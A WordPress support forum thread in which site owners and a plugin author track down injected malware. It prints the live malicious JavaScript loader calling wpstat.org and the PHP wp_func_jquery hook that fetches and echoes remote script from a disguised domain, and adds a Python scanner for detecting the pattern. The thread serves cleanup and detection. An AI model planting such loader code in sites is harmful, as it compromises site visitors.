• Resolved marcsohier

    (@marcsohier)


    Hello Eli,

    Thanks for your great plugin. I am facing some issues with malware injected into my WordPress website.

    Before setting up your plugin, I had manually removed infected files with the code <?php include('assets/images/social.png'); ?>.

    Then your plugin found one more file infected that I missed manually. Your plugin now says that my website is clean.

    However, I still think my website is infected, as using the Chrome Console I always find this script in my source code:

    <script type="text/javascript">
    var now = new Date().getTime();
    if (now%2 == 0) {
    if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.js"></scr'+'ipt>'); }
    }
    </script>

    I've been trying for hours to solve this issue but I do not succeed. I've backed up my website locally and did thousands of string searches, and I did not find which file is calling this script just above the </footer>.

    The file social.png apparently adds some data in the SQL database, but even here I did not find anything relevant explaining how this code is loaded.

    I would be really grateful if you have any idea or solution.

    Thanks a lot for your great help to everyone.

    Marc

    https://wordpress.org/plugins/gotmls/

Viewing 12 replies - 1 through 12 (of 12 total)
  • Thread Starter marcsohier

    (@marcsohier)

    Here is my website : http://www.angelinextension.com/.

    I forgot to mention that I have also tried to block this query using the plugin BBQ Block Bad Queries but it still loads the script.

    Thank you Eli,

    Marc

    Plugin Author Eli

    (@scheeeli)

    I see that script output in the HTML source code of your site, but without access to the back-end I won’t be able to determine where it is coming from. It may be helpful for you to search the contents of your plugin and theme files for this md5 hash 74be16979710d4c4e7c6647856088456 that is referenced by the comment just above the script output in question. If you find this in a PHP file then it is likely that the code that renders that malicious script is right below it.

    Let me know if you find it so I can add it to my definition updates. You can contact me directly at: eli AT gotmls DOT net

    Plugin Author Eli

    (@scheeeli)

    Thanks for sending me your info.

    It looks to me like all those wp_func_jquery functions are malicious. I have found at least 3 different variations of it in various plugins and in your theme, but I don't think it was originally part of any of those files. I know that code looks pretty legitimate and this hacker has written it to integrate into WordPress better than a lot of the legitimate plugins out there, but if you look at the whole URL that is constructed it is not a legitimate domain to be downloading any jquery files from. And you would not really want to be remotely fetching your jquery files from a third-party host at some obscure domain anyway.

    All these wp_func_jquery functions are similar enough to say that they were written by the same hacker, but they have been injected into different include files in unrelated plugins and themes. So, I am collecting these new variants and adding them to my definition updates now.

    I expect that when they are all removed we will not see that script in the output of your footer…

    Thread Starter marcsohier

    (@marcsohier)

    Eli, thanks a lot for your great help and amazing skills.

    Marc

    How did you guys get that code removed? I seem to be having the very same issue in my footer as well – and I have downloaded my entire directory and ran a search using FileSeek and can't seem to find where that code made it in.

    The site btw is rapidpurple.com

    Plugin Author Eli

    (@scheeeli)

    Have you tried using my Anti-Malware plugin to scan your site?

    In the case of Marc’s site it was a custom function called wp_func_jquery that was hooked into WordPress using add_action in various theme and plugin files. I have added this threat to my Definition Updates so that it can be automatically fixed (even if it is not called “wp_func_jquery”).

    You’ll need to register my plugin and download the latest Definition updates but then it should be able to remove this threat for you.

    Aloha, Eli

    Registering and giving it a go now. Fingers crossed Eli.

    You called it mate. The new definition updates squared this away also. Thanks Eli!

    For anyone else – it seems the following was the ACTUAL code related to this:

    if(!function_exists('wp_func_jquery')) {
        function wp_func_jquery() {
            $host = 'http://';
            $jquery = $host.'c'.'jquery.org/jquery-ui.js';
            $headers = @get_headers($jquery, 1);
            if ($headers[0] == 'HTTP/1.1 200 OK'){
                echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
            }
        }
        add_action('wp_footer', 'wp_func_jquery');
    }

    This looked so weird to me too and yet I overlooked it due to the jquery.org reference.
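    Eli's description above (a callback hooked into wp_footer via add_action that fetches a remote file and echoes it) and the snippet metalp3n posted describe the same pattern. The following heuristic scanner is an added example, not code from the thread or from the GOTMLS plugin: it finds wp_footer/wp_head callbacks whose body both performs a remote fetch and echoes output, and flags the split-URL trick (a bare 'http://' literal). The two PHP samples are constructed inline; the malicious one mirrors the posted snippet with the domain replaced by a placeholder.

```python
import re

# Constructed sample: the wp_func_jquery pattern from this thread (domain replaced with a placeholder)
MALICIOUS = r"""<?php
if(!function_exists('wp_func_jquery')) {
    function wp_func_jquery() {
        $host = 'http://';
        $jquery = $host.'c'.'jquery.example/jquery-ui.js';
        $headers = @get_headers($jquery, 1);
        if ($headers[0] == 'HTTP/1.1 200 OK'){
            echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
        }
    }
    add_action('wp_footer', 'wp_func_jquery');
}
"""

# Constructed sample: a legitimate footer hook that only prints local markup
BENIGN = r"""<?php
function my_theme_footer_note() {
    echo '<p class="credit">Theme by Example</p>';
}
add_action('wp_footer', 'my_theme_footer_note');
"""

# add_action('wp_footer'|'wp_head', 'callback_name')
HOOK_RE = re.compile(r"add_action\(\s*['\"](wp_footer|wp_head)['\"]\s*,\s*['\"](\w+)['\"]")
# Functions that pull content from a remote host (WordPress HTTP API and raw PHP alike)
FETCH_RE = re.compile(r"\b(wp_remote_get|wp_remote_retrieve_body|file_get_contents|curl_exec|get_headers)\s*\(")
# A string literal holding only the scheme: the URL is assembled from fragments to defeat plain grep
SPLIT_URL_RE = re.compile(r"['\"]https?://['\"]")


def function_body(src, name):
    """Return the body of the named function using brace matching (sufficient for flat plugin files)."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def suspicious_footer_hooks(src):
    """Return (callback, uses_split_url) for footer/head callbacks that fetch remote content and echo it."""
    hits = []
    for _hook, callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        fetches = FETCH_RE.search(body) is not None
        echoes = re.search(r"\b(echo|print)\b", body) is not None
        if fetches and echoes:
            hits.append((callback, SPLIT_URL_RE.search(body) is not None))
    return hits
```

Run it over every .php file in wp-content/themes and wp-content/plugins; a hit is a file to read by hand, not an automatic verdict.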

    absoluteczech

    (@absoluteczech)

    @metalp3n
    Thank you so much! That was the exact same code I had in my theme. I couldn't figure out where it was coming from!

    Metalp3n

    (@metalp3n)

    @absoluteczech glad to help!

    Hi,

    Sorry that I'm jumping in on this uninvited, but I have similar problems with another version of the same(?) virus: PHP:Agent-IN[Trj] (https://wordpress.org/support/topic/been-hacked-3).

    I have installed Anti-Malware from GOTMLS.NET and it found some problems, but I am almost a newbie and really don't know what to do next.

    Can anyone help?

    Thank you,
    Cosmin


The topic ‘Malware php:agent-uf [trj] still loading a script.’ is closed to new replies.